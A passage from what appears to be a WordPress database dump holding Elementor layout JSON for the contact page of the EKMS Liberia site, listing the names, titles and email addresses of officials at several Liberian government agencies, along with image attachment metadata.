Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>Division of Knowledge Management &amp; Archive<br \\/>MOCI<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"27df91b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a7132bc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\n<\\/br>\\nManager\\n<\\/br>\\nDepartment of Marine Fisheries and Environment\\n<\\/br>\\nNaFAA\\n<\\/br>\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a594c07\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"861733c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"784af4b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2022\\/09\\/nadine.jpg\",\"id\":5093,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4f48179\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<br \\/><a href=\\\"&quot;mailto:stephenlavalah@yahoo.com\\\">stephenlavalah@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d029a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine A\'jami<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6cd1f2c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0080713\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc1d16\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/sherman.png\",\"id\":3644}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"758c067\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/borbor.png\",\"id\":3646}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5788b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"369beaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Albert M. Sherman <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:itssherman@gmail.com\\\">itssherman@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e5b0622\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Amos Borbor <\\/strong><br \\/>Finance &amp; Administrative Officer<br \\/>MOT<br \\/><a href=\\\"mailto:felixborbor@gmail.com\\\">felixborbor@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"58a8bc8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/simpson.png\",\"id\":3651}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c7ec2c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry A. Simpson <\\/strong><br \\/>Weather Forecaster<br \\/>MOT<br \\/><a href=\\\"mailto:ransford2024@gmail.com\\\">ransford2024@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c5ecaba\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>James Kollie <\\/strong><br \\/>MOT<br \\/><a href=\\\"mailto:jameskollie@yahoo.com\\\">jameskollie@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"308cd55\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Eric Pervist <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:gendermedia1@gmail.com\\\">gendermedia1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bcdddb1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"98f890d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c45b21c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f07c86\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"1205269\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5891ccb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/domah.png\",\"id\":3659}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ace9d4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"765a1b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6893e76\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"237d9e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d02417\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>N. Mamatu G. King <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>Administrative Assistant, Office of the Minister<br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel G. Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:emmanuelgballah_@gmail.com\\\">emmanuelgballah_@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(34878,5096,'_elementor_pro_version','3.7.1'),(34880,5097,'_wp_attached_file','2022/09/henry.jpg'),(34881,5097,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:17:\"2022/09/henry.jpg\";s:5:\"sizes\";a:12:{s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"henry-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"henry-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:17:\"henry-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:16:\"henry-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:17:\"henry-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:17:\"henry-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:17:\"henry-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:17:\"henry-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-l\";a:4:{s:4:\"file\";s:17:\"henry-700x650.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:17:\"henry-600x559.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:17:\"henry-640x640.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"kava-thumb-justify-2\";a:4:{s:4:\"file\";s:17:\"henry-700x640.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34882,5098,'_elementor_edit_mode','builder'),(34883,5098,'_elementor_template_type','wp-page'),(34884,5098,'_elementor_version','3.6.6'),(34885,5098,'_wp_page_template','default'),(34886,5098,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/